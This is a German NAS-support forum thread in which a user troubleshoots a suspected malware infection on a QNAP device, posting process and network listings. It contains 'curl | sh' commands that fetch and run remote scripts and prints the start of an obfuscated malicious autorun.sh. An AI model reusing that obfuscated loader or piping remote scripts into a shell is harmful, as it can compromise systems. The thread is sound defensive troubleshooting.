Hab ich mir einen Virus eingefangen?

SM52 · 2. Juni 2021

Hallo an alle,

nach langer langer Zeit melde ich mich nochmal.

Glaube mein NAS hat sich was eingefangen.

Ich kann keine Apps mehr installieren oder stoppen.

Vom Googlen her, passt das zu einem Befall oder?

Ich habe mit den Mitteln die ich gefunden habe, bisher keinen Erfolg.

Habe 2 Skripte getestet. Beide laufen nicht sauber durch...

Code

[~] # curl https://download.qnap.com/Storage/tsd/utility/derek-be-gone.sh | sh
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed 


  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0
100   380  100   380    0     0   4672      0 --:--:-- --:--:-- --:--:--  4871
sh: line 1: syntax error near unexpected token `newline'
sh: line 1: `'

Code

(B[~] # curl https://download.qnap.com/Storage/tsd/utility/cleanme.sh | sh

  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current

                                 Dload  Upload   Total   Spent    Left  Speed
  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0

100   374  100   374    0     0   4157      0 --:--:-- --:--:-- --:--:--  4794

sh: line 1: syntax error near unexpected token `newline'

sh: line 1: `'

Alles anzeigen

Hat noch jemand einen Tipp für mich?

tiermutter · 2. Juni 2021

Für QNAP existiert eine Menge Malware... Das lässt sich nicht alles mit dem lösen was Du versucht hast. Aber fangen wir mal von vorne an:

Welches Gerät, welches QTS / Firmware?

Ist das Installieren und Stoppen von Apps dein einziges Problem? Dateien alle aufrufbar? Was sagen CPU und RAM Auslastung? Ist das NAS aus dem Internet erreichbar (gewesen)?

Was passiert wenn Du Apps installieren oder stoppen willst?

dolbyman · 2. Juni 2021

Beide Skript laufen nicht mehr da QNAP die Ressourcen schon vor langem offline genommen hat.

Welche Firmware? Malware Remover schon gelaufen?

Welche Prozesse laufen denn? War das NAS dem freien Internet ausgesetzt ?

SM52 · 2. Juni 2021

Ich habe ein TS469L.

Die Firmware ist 4.3.4.1652.

Hab ich vor ca 2 Wochen upgedatet.

Davor hab ich (zu meiner Schande) recht lange keine Updates eingespielt.

Das NAS hing hinter meiner FritzBox mit eingerichteter qnap cloud.

Den MalewareRemover bekomme ich nicht installiert.

Genau wie andere App Updates.

Laufen tut ansonsten alles.

dolbyman · 2. Juni 2021

QNAP Cloud mit Portforwards ? .. Dann ist zumindest eine Infektion nicht abwegig.

Wie gesagt mal Prozesse checken, ob die CPU damit beschäftigt ist alle Dateien gegen Lösegeld zu verschlüsseln.

rednag · 2. Juni 2021

Kommt das NAS ins Netz?

Kannst Du generell keine Apps installieren oder nur spezifische nicht?

Zitat von SM52

Davor hab ich (zu meiner Schande) recht lange keine Updates eingespielt.

Was auch immer das heißen mag.

SM52 · 2. Juni 2021

Zitat von dolbyman

QNAP Cloud mit Portforwards ? .. Dann ist zumindest eine Infektion nicht abwegig.

Wie gesagt mal Prozesse checken, ob die CPU damit beschäftigt ist alle Dateien gegen Lösegeld zu verschlüsseln.

Ja, die waren aktiviert.........

Der Ressourcenmonitor will nicht starten. Die Anzeige der CPU im Dashboard bewegt sich immer im unteren einstelligen Prozentbereich.

Zitat von rednag

Kommt das NAS ins Netz?
Kannst Du generell keine Apps installieren oder nur spezifische nicht?

Zumindest bekomme ich über ssh Google angepingt.

Bekomme keine App installiert.

rednag · 2. Juni 2021

Gut, wenigsten etwas.

DNS funktioniert auch?

Poste mal die Ausgabe von top

SM52 · 2. Juni 2021

Code

Mem: 924864K used, 83588K free, 32028K shrd, 46464K buff, 2152
CPU:  7.8% usr  3.2% sys  0.0% nic 88.4% idle  0.4% io  0.0% i
Load average: 0.98 1.03 2.24 2/771 27293
  PID  PPID USER     STAT   VSZ %VSZ CPU %CPU COMMAND
10869     1 admin    S     217m 21.9   3  1.8 {snapshotd} /usr/
10627     1 admin    S     628m 63.3   1  0.6 /usr/bin/nvrd    
30558     1 admin    S    2536m255.6   1  0.4 {tvmosaic_server}
25873 25870 admin    S     753m 75.9   1  0.2 {python} /mnt/ext
 2556     1 admin    S     341m 34.4   3  0.2 hawkeye-agent   
  477     1 admin    S     774m 78.0   3  0.1 /sbin/hal_daemon 
 9965     1 admin    S     295m 29.8   2  0.1 {_thttpd_.nvr} /u
 4665     1 admin    S     262m 26.4   0  0.1 {python2} /mnt/ex
31908 31467 admin    S    1963m197.8   0  0.0 {mysqld} /usr/loc
 3856     1 admin    S     549m 55.3   3  0.0 /sbin/upnpd eth0 
 6541     1 admin    S     452m 45.5   3  0.0 {clouddrive} pyth
11197     1 admin    S     281m 28.3   3  0.0 {overwrited} /usr
10827     1 admin    S     238m 24.0   0  0.0 /usr/bin/evtd    
 4295     1 admin    S     195m 19.6   1  0.0 mockingbird
27247 27138 admin    R    16156  1.5   2  0.0 top
11433     2 admin    SW       0  0.0   1  0.0 [kworker/1:1]
17429     2 admin    SW       0  0.0   0  0.0 [kworker/0:1]    
28750 10221 admin    S <  3457m348.4   2  0.0 {apache_proxy} /u
 3135  8409 httpdusr S    1781m179.5   2  0.0 /usr/local/apache
22997     1 admin    S    1727m174.0   3  0.0 {cc3-fastcgi} pyt
13218 13217 admin    S     860m 86.7   0  0.0 {charon} /IPSEC/l
 5911  5528 admin    S     857m 86.3   0  0.0 {mysqld} /usr/loc
17366 16876 admin    S     744m 75.0   1  0.0 {mysqld} /usr/loc
 4975     1 admin    S     613m 61.8   3  0.0 /sbin/upnpd eth0 
 3873     1 admin    S     337m 33.9   3  0.0 {gmond_agent} /mn
11005     1 admin    S     323m 32.6   0  0.0 /usr/bin/vcamd   
32190 32189 httpdusr S     309m 31.2   0  0.0 php-fpm: pool www
32189     1 admin    S     309m 31.2   2  0.0 php-fpm: master p
10170     1 admin    S     309m 31.2   0  0.0 {php-fpm-proxy} p
32191 32189 httpdusr S     309m 31.2   2  0.0 php-fpm: pool www
10171 10170 admin    S     309m 31.2   0  0.0 {php-fpm-proxy} p
10172 10170 admin    S     309m 31.2   0  0.0 {php-fpm-proxy} p
 9617     1 admin    S     290m 29.2   0  0.0 {smbd} /usr/local
 9663  9617 admin    S     290m 29.2   1  0.0 {lpqd} /usr/local
 9621  9617 admin    S     288m 29.0   1  0.0 {cleanupd} /usr/l
 9620  9617 admin    S     288m 29.0   1  0.0 {smbd-notifyd} /u
31412     1 admin    S     283m 28.5   3  0.0 {python} /mnt/ext
11486     1 admin    S     275m 27.7   2  0.0 /usr/bin/qplayd
 9910  9908 admin    S     267m 26.9   1  0.0 {mytranscodesvr} 
 2170     1 admin    S     261m 26.3   2  0.0 {winbindd} /usr/l
10559     1 admin    S     243m 24.5   3  0.0 /usr/bin/evtLogd
 9660     1 admin    S     207m 20.9   3  0.0 {nmbd} /usr/local
10740     1 admin    S     199m 20.1   3  0.0 /usr/bin/imgsvcd
10896     1 admin    S     199m 20.0   3  0.0 /usr/bin/ptzd
11541     1 admin    S     194m 19.5   0  0.0 /usr/bin/cacd
21782     1 admin    S     182m 18.4   3  0.0 python3 /share/MD
 8944     1 admin    S     182m 18.4   2  0.0 /usr/bin/wdd
10221     1 admin    S <   171m 17.2   0  0.0 {apache_proxy} /u
12448 10221 admin    S <   171m 17.2   2  0.0 {apache_proxy} /u
21432     1 admin    S     166m 16.7   1  0.0 {RTRR_MANAGER} /u
 8409     1 admin    S     161m 16.3   0  0.0 /usr/local/apache
 3123  8409 httpdusr S     161m 16.3   0  0.0 /usr/local/apache

Alles anzeigen

Wie teste ich den DNS?

rednag · 2. Juni 2021

Bin mir nicht ganz sicher was /usr/bin/ptzd und hawkeye-agent ist.

Wie sieht die autorun.sh aus?

Stell bitte die Ausgabe von ps rein.

dolbyman · 2. Juni 2021

hawkeye-agent kommt von Qcenter glaub ich

SM52 · 2. Juni 2021

PS

Code

[~] # ps

  PID  Uid     VmSize Stat Command
    1 admin       640 S   init
    2 admin           SW  [kthreadd]
    3 admin           SW  [ksoftirqd/0]
    5 admin           SW  [kworker/u:0]
    6 admin           SW  [migration/0]
    7 admin           SW  [migration/1]
    9 admin           SW  [ksoftirqd/1]
   11 admin           SW  [migration/2]
   13 admin           SW  [ksoftirqd/2]
   14 admin           SW  [migration/3]
   16 admin           SW  [ksoftirqd/3]
   17 admin           SW< [khelper]
   18 admin           SW  [kdevtmpfs]
   19 admin           SW  [sync_supers]
   20 admin           SW  [bdi-default]
   21 admin           SW< [kintegrityd]
   22 admin           SW< [kblockd]
   23 admin           SW< [tifm]
   24 admin           SW< [ata_sff]
   25 admin           SW  [khubd]
   26 admin           SW  [kethubd]
   27 admin           SW< [md]
   28 admin           SW< [cfg80211]
   29 admin           SW< [rpciod]
   39 admin           SW  [kswapd0]
   40 admin           SWN [ksmd]
   41 admin           SW  [fsnotify_mark]
   42 admin           SW  [ecryptfs-kthrea]
   43 admin           SW< [nfsiod]
   44 admin           SW< [cifsiod]
   45 admin           SW< [crypto]
   67 admin           SW< [kthrotld]
   69 admin           SW< [kmpath_rdacd]
   70 admin           SW  [scsi_eh_0]
   71 admin           SW  [scsi_eh_1]
   72 admin           SW  [scsi_eh_2]
   73 admin           SW  [scsi_eh_3]
   74 admin           SW  [scsi_eh_4]
   75 admin           SW  [scsi_eh_5]
   81 admin           SW  [kworker/u:6]
   82 admin           SW< [dm-block-clone]
   83 admin           SW< [kmpathd]
   84 admin           SW< [kmpath_handlerd]
   88 admin           SW< [deferwq]
   89 admin           SW< [ttm_swap]
  215 admin           SW< [dm_bufio_cache]
  230 admin           SW  [scsi_eh_6]
  231 admin           SW  [usb-storage]
  285 admin       412 S < udevd --daemon
  375 admin           SW  [md9_raid1]
  387 admin           SW  [kjournald]
  400 admin           SW  [md13_raid1]
  477 admin      2540 S   /sbin/hal_daemon -f
  599 guest       992 S   avahi-daemon: running [NAS.local]
  610 admin           SW  [md256_raid1]
  614 admin           SW  [flush-9:9]
  682 admin           SW  [md0_raid5]
  736 admin           SW  [jbd2/md0-8]
  737 admin           SW< [ext4-dio-unwrit]
  796 admin           SW  [flush-9:0]
  823 admin       204 S   /sbin/lvmetad
 1001 admin           SW  [jbd2/md13-8]
 1002 admin           SW< [ext4-dio-unwrit]
 1433 admin           SW< [cryptodev_queue]
 1469 admin           SW  [fnotify]
 1478 admin       396 S < qWatchdogd: keeping alive every 5 se
 1514 admin           SW< [hd-audio0]
 1676 admin       500 S   /sbin/netwatchdog -d
 1946 admin       608 S   /sbin/modagent
 2170 admin      1156 S   /usr/local/samba/sbin/winbindd -s /e
 2334 admin           SW  [kworker/0:0]
 2486 admin      1380 S   /mnt/ext/opt/hawkeye/monit/bin/monit
 2556 admin     27896 S   hawkeye-agent
 2972 admin           SW  [kworker/2:2]
 3053 admin           SW< [bond0]
 3123 httpdusr    972 S   /usr/local/apache/bin/fcgi-p -k star
 3135 httpdusr   3828 S   /usr/local/apache/bin/apache -k star
 3856 admin       596 S   /sbin/upnpd eth0 eth0
 3873 admin     62788 S   /mnt/ext/opt/hawkeye/ganglia/sbin/gm
 4295 admin     12244 S   mockingbird
 4665 admin      6868 S   /mnt/ext/opt/Python/bin/python2 /sbi
 4975 admin       544 S   /sbin/upnpd eth0 eth0
 5232 admin       472 S   /bin/ip monitor route
 5417 admin           SW< [iscsi_eh]
 5425 admin           SW  [qnap_et]
 5438 admin       412 S   /sbin/iscsid --config=/etc/config/is
 5439 admin      2716 S < /sbin/iscsid --config=/etc/config/is
 5446 admin      1876 S   /sbin/vdd_control -d
 5528 admin      1012 S   /bin/sh /usr/local/mariadb/bin/mysql
 5911 admin      1836 S   /usr/local/mariadb/bin/mysqld --defa
 6541 admin      2212 S   python3.6 -m clouddrive.mount start
 6612 guest       424 S   /usr/sbin/dbus-daemon --system
 6798 guest      3828 S   proftpd: (accepting connections)
 6803 admin       340 S   proftpd: (RPC)
 6997 admin      2576 S   /sbin/upnpcd -i 300
 7030 admin       204 S   /sbin/mcelog --daemon
 7191 admin       592 S   /sbin/getty 115200 tty1
 7192 admin       592 S   /sbin/getty 115200 tty2
 8409 admin      2840 S   /usr/local/apache/bin/apache -k star
 8833 admin      1212 S   /sbin/daemon_mgr.nvr
 8888 admin           SW  [flush-8:64]
 8944 admin       504 S   /usr/bin/wdd
 8976 admin      1364 S   /usr/sbin/cupsd -C /etc/config/cups/
 9617 admin      1084 S   /usr/local/samba/sbin/smbd -l /var/l
 9620 admin       540 S   /usr/local/samba/sbin/smbd -l /var/l
 9621 admin       436 S   /usr/local/samba/sbin/smbd -l /var/l
 9660 admin      1108 S   /usr/local/samba/sbin/nmbd -l /var/l
 9663 admin       620 S   /usr/local/samba/sbin/smbd -l /var/l
 9737 admin           SW  [kworker/3:0]
 9896 admin      2376 S   /usr/local/sbin/_thttpd_ -p 58080 -n
 9908 admin       560 S   /usr/sbin/SCREEN -dmS MYTRANSCODE /u
 9910 admin      1120 S   /usr/local/medialibrary/bin/mytransc
 9965 admin      5676 S   /usr/local/sbin/_thttpd_.nvr -p 1010
10170 admin      1092 S   php-fpm: master process (/etc/php-fp
10171 admin       224 S   php-fpm: pool www
10172 admin       224 S   php-fpm: pool www
10221 admin      2440 S < /usr/local/apache/bin/apache_proxy -
10391 admin       668 S   /usr/sbin/inotifywait -e close_write
10559 admin      2256 S   /usr/bin/evtLogd
10627 admin     44104 S   /usr/bin/nvrd
10631 admin      2380 S   /usr/local/sbin/remote_folder_daemon
10673 httpdusr   1108 S   /sbin/lpb_scheduler -d
10740 admin       904 S   /usr/bin/imgsvcd
10747 admin      1888 S   /sbin/genthd
10827 admin      1452 S   /usr/bin/evtd
10869 admin      2744 S   /usr/bin/snapshotd
10896 admin       680 S   /usr/bin/ptzd
10952 admin           SW< [krfcommd]
11005 admin      1604 S   /usr/bin/vcamd
11103 admin      1188 S   /usr/sbin/ntpdated
11197 admin      1888 S   /usr/bin/overwrited
11266 admin      2116 S   /usr/sbin/upsutil
11368 admin      2976 S   /usr/sbin/sshd -f /etc/config/ssh/ss
11433 admin           RW  [kworker/1:1]
11486 admin      2096 S   /usr/bin/qplayd
11541 admin      2988 S   /usr/bin/cacd
11742 admin           SW  [kworker/1:0]
12188 admin       448 S   sleep 60
12269 admin       704 S   /usr/sbin/crond -l 9 -c /tmp/cron/cr
12448 admin       944 S < /usr/local/apache/bin/fcgi-pm      -
12472 admin      1068 S   /usr/bin/lunportman
12565 admin      2428 S   /usr/local/bin/snmpd -c /etc/config/
12931 admin      2336 S   /sbin/bcclient
12967 admin      4332 R   sshd: admin@pts/1
13045 admin       484 S N /sbin/acpid
13217 admin       408 S   /IPSEC/libexec/ipsec/starter --daemo
13218 admin      1248 S   /IPSEC/libexec/ipsec/charon --use-sy
13243 admin       220 S   /usr/sbin/xl2tpcd -c /etc/xl2tpd/xl2
13279 admin      2012 S   -sh
13366 admin      3768 S   management/manaRequest.cgi
13396 admin           Z   [chartReq.cgi]
13405 admin         4 S   [kworker/0:1]
13406 admin       444 S   /bin/sleep 1
13407 admin      4184 S   manaRequest.cgi
13408 admin       996 S   /usr/local/sbin/_thttpd_ -p 58080 -n
13413 admin      1000 R   ps
13731 admin      1004 S   /usr/local/sbin/qvpnd -d -p /var/run
13840 admin       752 S   /sbin/gen_bandwidth -r -i 5
13921 admin       808 S   /usr/sbin/noip2 -d
14107 admin      1004 S   /bin/sh /etc/init.d/klogd.sh start
14110 admin      2080 S   qLogEngined: Write log is enabled...
14111 admin      1100 S   /sbin/qsyslogd
14114 admin      1144 S   /sbin/qShield
14128 admin      1212 S   qNoticeEngined: Write notice is enab
14346 admin       308 S   /bin/dd if /proc/kmsg of /mnt/HDA_RO
14630 admin      1732 S   /sbin/sdmd --daemon
14951 admin       428 S   /usr/bin/portmap
15003 admin       740 S   /usr/local/bin/pn_daemon -d 7
15209 admin         4 S   /usr/sbin/rpc.rquotad -p 30002
15666 admin      2340 S   /usr/sbin/rpc.mountd -p 30000 -F
15983 admin      3028 S   _thttpd_
16113 admin           SW  [lockd]
16114 admin           SW< [nfsd4]
16115 admin           SW< [nfsd4_callbacks]
16116 admin           SW  [nfsd]
16117 admin           SW  [nfsd]
16118 admin           SW  [nfsd]
16119 admin           SW  [nfsd]
16120 admin           SW  [nfsd]
16121 admin           SW  [nfsd]
16122 admin           SW  [nfsd]
16123 admin           SW  [nfsd]
16557 admin      1408 S   /usr/sbin/rpc.statd -p 30001
16876 admin      1008 S   /bin/sh /usr/local/mysql/bin/mysqld_
17366 admin      4364 S   /usr/local/mysql/bin/mysqld --defaul
17429 admin           SW  [kworker/0:1]
17954 admin      1372 S   /sbin/daemon_mgr
18444 admin      1396 S   /bin/sh /sbin/qdesk_soldier
19244 admin       692 S   /usr/sbin/bluetoothd
19265 admin       268 S   /usr/sbin/agent --adapter hci0
20075 admin      1236 S   /bin/sh /share/MD0_DATA/.qpkg/CloudL
21432 admin      1488 S   /usr/bin/RTRR_MANAGER
21759 admin      1156 S   RTRR_DAEMON -syslog -c:/etc/qsync/qs
21782 admin      2200 S   python3 /share/MD0_DATA/.qpkg/Hybrid
22062 admin       456 S   python3 /share/MD0_DATA/.qpkg/Hybrid
22997 admin     45972 S   python /share/MD0_DATA/.qpkg/HybridB
25044 admin           SW  [kworker/3:1]
25116 admin       960 S   /bin/sh /share/MD0_DATA/.qpkg/Hybrid
25895 admin           SW  [kworker/2:0]
28408 admin           SW  [kworker/3:2]
28750 admin      9640 S < /usr/local/apache/bin/apache_proxy -
29392 admin      2084 S   /mnt/ext/opt/apache/bin/php /share/M
29841 admin      3572 S   /usr/local/bin/porter -d 7
30558 admin     16208 S   /share/MD0_DATA/.qpkg/TVMosaic/tvmos
31412 admin      2972 S   /mnt/ext/opt/qmail/python/bin/python
31467 admin      1112 S   /bin/sh /usr/local/mysql/bin/mysqld_
31551 admin        20 S N /sbin/dhcpcd -h NAS -G eth0
31908 admin     49168 S   /usr/local/mysql/bin/mysqld --defaul
32189 admin      1124 S   php-fpm: master process (/etc/config
32190 httpdusr   1460 S   php-fpm: pool www
32191 httpdusr   1316 S   php-fpm: pool www
[~] #

Alles anzeigen

rednag · 3. Juni 2021

Sieht auf den ersten Blick eigentlich unspektakulär aus.

Wie sieht die autorun.sh aus?

Systemsteuerung -> System -> Hardware -> autorun.sh" anzeigen.

Und die Ausgabe von netstat -tulpen

SM52 · 3. Juni 2021

Könnte eben nicht mehr schreiben.

Zeichenlimit.....

Die Autorin ist sehr lang und kryptisch. Hier der Anfang:

Bash

#!/bin/sh 


$AtecHcTovPwE$""t${iTiK}ype;t$'\x65'st${vFYiblbqWenenqb}${bMCOmH}${nfWvizJtLbULFQj};buil${XdwELjMFv}tin;$'\x74'${kOrRV}rue;${hGjcaqEk}tru${iiKRdCrLhTvm}e${AILHCX};f${QqCITwx}${zdDyx}a${sWbytd}lse;${pwiSn}fa${enKnzSEGfmokLh}lse;${USUHNZn}command${qFJQEfiKg};e${tjXfLtvY}v${IzKhp}${rnasdkfcGzC}al;${VPwTQwz}type${rciUNRiutbWfe};e${BQxyFSO}val;buil${GzivA}tin;ev${TiEuipv}${wDNDB}al;${elSPtyzOGPDVVWc}ev${CmXFzUKjCWZECCs}al;bu${nAgxTJFWgzzfhls}ilti${RIAlqxTnRQy}n;CjlyXS=t${pLTkcd}r${ZFqllqGJxy}

netstat -tulpen

Code

[~] # netstat -tulpen
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 192.168.99.22:49152     0.0.0.0:*               LISTEN      3856/upnpd
tcp        0      0 127.0.0.1:58080         0.0.0.0:*               LISTEN      9896/_thttpd_
tcp        0      0 0.0.0.0:49153           0.0.0.0:*               LISTEN      30558/tvmosaic_serv
tcp        0      0 0.0.0.0:2049            0.0.0.0:*               LISTEN      -
tcp        0      0 192.168.99.22:49154     0.0.0.0:*               LISTEN      4975/upnpd
tcp        0      0 0.0.0.0:8899            0.0.0.0:*               LISTEN      22062/python3
tcp        0      0 127.0.0.1:40740         0.0.0.0:*               LISTEN      29392/php
tcp        0      0 0.0.0.0:46246           0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:6600            0.0.0.0:*               LISTEN      3873/gmond_agent
tcp        0      0 0.0.0.0:139             0.0.0.0:*               LISTEN      9617/smbd
tcp        0      0 127.0.0.1:3310          0.0.0.0:*               LISTEN      5911/mysqld
tcp        0      0 0.0.0.0:111             0.0.0.0:*               LISTEN      14951/portmap
tcp        0      0 0.0.0.0:30000           0.0.0.0:*               LISTEN      15666/rpc.mountd
tcp        0      0 0.0.0.0:30001           0.0.0.0:*               LISTEN      16557/rpc.statd
tcp        0      0 0.0.0.0:38898           0.0.0.0:*               LISTEN      21782/python3
tcp        0      0 0.0.0.0:30002           0.0.0.0:*               LISTEN      15209/rpc.rquotad
tcp        0      0 0.0.0.0:38899           0.0.0.0:*               LISTEN      21759/RTRR_DAEMON
tcp        0      0 127.0.0.1:8820          0.0.0.0:*               LISTEN      2556/hawkeye-agent
tcp        0      0 127.0.0.1:10100         0.0.0.0:*               LISTEN      9965/_thttpd_.nvr
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      11368/sshd
tcp        0      0 0.0.0.0:9270            0.0.0.0:*               LISTEN      30558/tvmosaic_serv
tcp        0      0 0.0.0.0:631             0.0.0.0:*               LISTEN      8976/cupsd
tcp        0      0 0.0.0.0:9271            0.0.0.0:*               LISTEN      30558/tvmosaic_serv
tcp        0      0 127.0.0.1:5050          0.0.0.0:*               LISTEN      22997/python
tcp        0      0 0.0.0.0:51163           0.0.0.0:*               LISTEN      13405/0:1]
tcp        0      0 0.0.0.0:6621            0.0.0.0:*               LISTEN      4295/mockingbird
tcp        0      0 0.0.0.0:445             0.0.0.0:*               LISTEN      9617/smbd
tcp        0      0 127.0.0.1:6622          0.0.0.0:*               LISTEN      2486/monitd_agent
tcp        0      0 0.0.0.0:6623            0.0.0.0:*               LISTEN      2556/hawkeye-agent
tcp        0      0 :::2049                 :::*                    LISTEN      -
tcp        0      0 :::8899                 :::*                    LISTEN      22062/python3
tcp        0      0 :::139                  :::*                    LISTEN      9617/smbd
tcp        0      0 :::111                  :::*                    LISTEN      14951/portmap
tcp        0      0 :::30000                :::*                    LISTEN      15666/rpc.mountd
tcp        0      0 :::8080                 :::*                    LISTEN      10221/apache_proxy
tcp        0      0 :::80                   :::*                    LISTEN      3123/fcgi-p
tcp        0      0 :::30001                :::*                    LISTEN      16557/rpc.statd
tcp        0      0 :::8081                 :::*                    LISTEN      3123/fcgi-p
tcp        0      0 :::38899                :::*                    LISTEN      21759/RTRR_DAEMON
tcp        0      0 :::21                   :::*                    LISTEN      6798/proftpd: (acce
tcp        0      0 :::22                   :::*                    LISTEN      11368/sshd
tcp        0      0 :::631                  :::*                    LISTEN      8976/cupsd
tcp        0      0 :::51163                :::*                    LISTEN      13405/0:1]
tcp        0      0 :::56733                :::*                    LISTEN      -
tcp        0      0 :::445                  :::*                    LISTEN      9617/smbd
udp        0      0 0.0.0.0:2049            0.0.0.0:*                           -
udp    18432      0 0.0.0.0:68              0.0.0.0:*                           2170/winbindd
udp        0      0 224.1.8.35:51811        0.0.0.0:*                           4295/mockingbird
udp        0      0 224.1.8.35:51811        0.0.0.0:*                           4295/mockingbird
udp        0      0 127.0.0.1:621           0.0.0.0:*                           16557/rpc.statd
udp        0      0 0.0.0.0:111             0.0.0.0:*                           14951/portmap
udp        0      0 0.0.0.0:3702            0.0.0.0:*                           4665/python2
udp        0      0 192.168.99.255:137      0.0.0.0:*                           9660/nmbd
udp        0      0 192.168.99.22:137       0.0.0.0:*                           9660/nmbd
udp        0      0 0.0.0.0:137             0.0.0.0:*                           9660/nmbd
udp        0      0 192.168.99.255:138      0.0.0.0:*                           9660/nmbd
udp        0      0 192.168.99.22:138       0.0.0.0:*                           9660/nmbd
udp        0      0 0.0.0.0:138             0.0.0.0:*                           9660/nmbd
udp        0      0 0.0.0.0:161             0.0.0.0:*                           12565/snmpd
udp        0      0 0.0.0.0:1702            0.0.0.0:*                           13243/xl2tpcd
udp        0      0 127.0.0.1:43690         0.0.0.0:*                           4975/upnpd
udp        0      0 0.0.0.0:38616           0.0.0.0:*                           599/avahi-daemon: r
udp        0      0 0.0.0.0:5353            0.0.0.0:*                           599/avahi-daemon: r
udp        0      0 127.0.0.1:57097         0.0.0.0:*                           30558/tvmosaic_serv
udp        0      0 0.0.0.0:30000           0.0.0.0:*                           15666/rpc.mountd
udp        0      0 0.0.0.0:30001           0.0.0.0:*                           16557/rpc.statd
udp        0      0 0.0.0.0:30002           0.0.0.0:*                           15209/rpc.rquotad
udp        0      0 255.255.255.255:65332   0.0.0.0:*                           30558/tvmosaic_serv
udp        0      0 224.1.8.35:43851        0.0.0.0:*                           2556/hawkeye-agent
udp        0      0 127.0.0.1:38250         0.0.0.0:*                           3856/upnpd
udp        0      0 0.0.0.0:1900            0.0.0.0:*                           4975/upnpd
udp        0      0 0.0.0.0:1900            0.0.0.0:*                           3856/upnpd
udp        0      0 239.255.255.250:1900    0.0.0.0:*                           30558/tvmosaic_serv
udp        0      0 0.0.0.0:4500            0.0.0.0:*                           13218/charon
udp     2304      0 255.255.255.255:8097    0.0.0.0:*                           12931/bcclient
udp        0      0 255.255.255.255:8097    0.0.0.0:*                           12931/bcclient
udp        0      0 0.0.0.0:51623           0.0.0.0:*                           -
udp        0      0 224.1.8.35:43957        0.0.0.0:*                           3873/gmond_agent
udp        0      0 0.0.0.0:6611            0.0.0.0:*                           2556/hawkeye-agent
udp        0      0 0.0.0.0:983             0.0.0.0:*                           14951/portmap
udp        0      0 0.0.0.0:500             0.0.0.0:*                           13218/charon
udp        0      0 0.0.0.0:60924           0.0.0.0:*                           4665/python2
udp        0      0 :::2049                 :::*                                -
udp        0      0 :::111                  :::*                                14951/portmap
udp        0      0 :::59105                :::*                                -
udp        0      0 :::30000                :::*                                15666/rpc.mountd
udp        0      0 :::30001                :::*                                16557/rpc.statd
udp        0      0 :::4500                 :::*                                13218/charon
udp        0      0 :::983                  :::*                                14951/portmap
udp        0      0 :::500                  :::*                                13218/charon
[~] #

Alles anzeigen

Morgens geht's weiter. Muss mal in die Kiste, der Wecker geht früh...

dolbyman · 3. Juni 2021

Zitat von SM52

Die Autorin ist sehr lang und kryptisch. Hier der Anfang:

Yep, ist Malware .. also NAS Platt machen und neu aufsetzen

rednag · 3. Juni 2021

Jo, sieht danach aus.

Aber die autorun.sh kann doch nicht der einzige Garant dafür sein.

Kann man da nicht weitere Prozesse oder Verbindungen heranziehen?

Zumindest was außer den krytischen Angaben der autorun.sh auf eine Infektion hindeutet.

SM52 · 3. Juni 2021

Wenn ich das NAS platt mache, laufe ich Gefahr über das Backup "Systemeinstellungen sichern" mir den Virus wieder zu fangen?

Kann ich qmailagend ordentlich sichern?

Der fängt schon sehr lange meine Mails zum sichern ab.

Mal sehen, wo ich genug Speicher fürs Backup aufgetrieben bekomme.......

Oder klappt es, daß nas ohne hdds zu booten? Evtl kann man es dann resetten und den Pool wieder einhängen?

FSC830 · 3. Juni 2021

Nein, das geht nicht.

Ohne Platten ist nur ein kleiner Teil des QTS im DOM, das u.a. den Boot- und dann den Setupvorgang durchführt.

Es führt kein Weg am "plattmachen" der HDDs vorbei.

Wenn Du kein Backup hast, dann ist es jetzt wahrscheinlich auch zu spät.

Auf alle Fälle das NAS nicht mehr dem Internet aussetzen, Portfreigaben wegnehmen, UPNP deaktivieren, myQNAPcloud nicht mehr nutzen, ...

Ob das Sichern der Systemeinstellungen die Malware mitsichert? Mir wäre das Risiko zu gross, ich würde die mir notieren (Screenshots) und alles neu einrichten, ohne Backup.

Gruss

SM52 · 3. Juni 2021

Okay,

Backup mache ich aber. Läuft im Moment per rrpr. Seit dem letzten Backup hat sich nicht so viel getan.

Hab so gut es geht alle Daten gesichtet und kontrolliert.

Habe einen Ordner gefunden, der nicht von mir ist. Hab da schon Anzeige gegen Unbekannt gestellt, da der Inhalt (Bilder) nicht legal war.

NAS ist seit dem Virenverdacht von der cloud geztennt, Passwörter geändert und upnp am nas deaktiviert. Zusätzlich noch an der fritzbox der Internetzugang gesperrt ( außer temporär ausversehen ob ich Apps updaten kann).

Crazyhorse · 3. Juni 2021

Zitat von SM52

Habe einen Ordner gefunden, der nicht von mir ist. Hab da schon Anzeige gegen Unbekannt gestellt, da der Inhalt (Bilder) nicht legal war.

Darfst du das NAS dann überhaupt platt machen oder ist das jetzt ein Bewismittel?

Denn je nach dem was da verteilt wurde, kommen die mit der Anschluss IP erstmal zu dir und dann hast du das Ding gekillt und kannst nicht mehr beweisen, dass du das gar nicht warst.

Hab ich mir einen Virus eingefangen?

QuTS hero h5.1.6.2734 Build 20240414

QTS 5.1.6.2722 Build 20240402

Vulnerability in XZ Utils

Vulnerability in Network ＆ Virtual Switch

App Zugriff (von extern) auf verschlüsseltes Laufwerk

FRAGE: Malware Remover läuft seit Stunden bei 70%. Ist das normal?

Verschlüsselungstrojaner auf NAS

E-Mail mit Betreff: "QNAP Security Advisory | Bulletin ID: QSA-24-19"

SambaCry on QNAP NAS

Screenshots erstellen und im Forum einbinden (Windows)

(Betriebs)- System vs. Systemvolume - Hinweise zum Verständnis

QuDedup: Backup Job neu verlinken - Ein Ritt ins Verderben

[QUICK HOW-TO] Apps manuell auf ein anderes Volume verschieben

[QUICK HOW TO] QNAP Disks unter Windows mit UFS Explorer auslesen

Kodi-Headless Server als Docker-Container

Hardware Praxis – „Hör mal wer da surrt“: Ein Erfahrungsbericht aus dem IT-Alltag

Hardware Praxis – Tipps zum Einbau einer neuen Festplatte: Ergänzung

Foren Update im Juli / August geplant

IT-Geschichten – Die verrückte Tastatur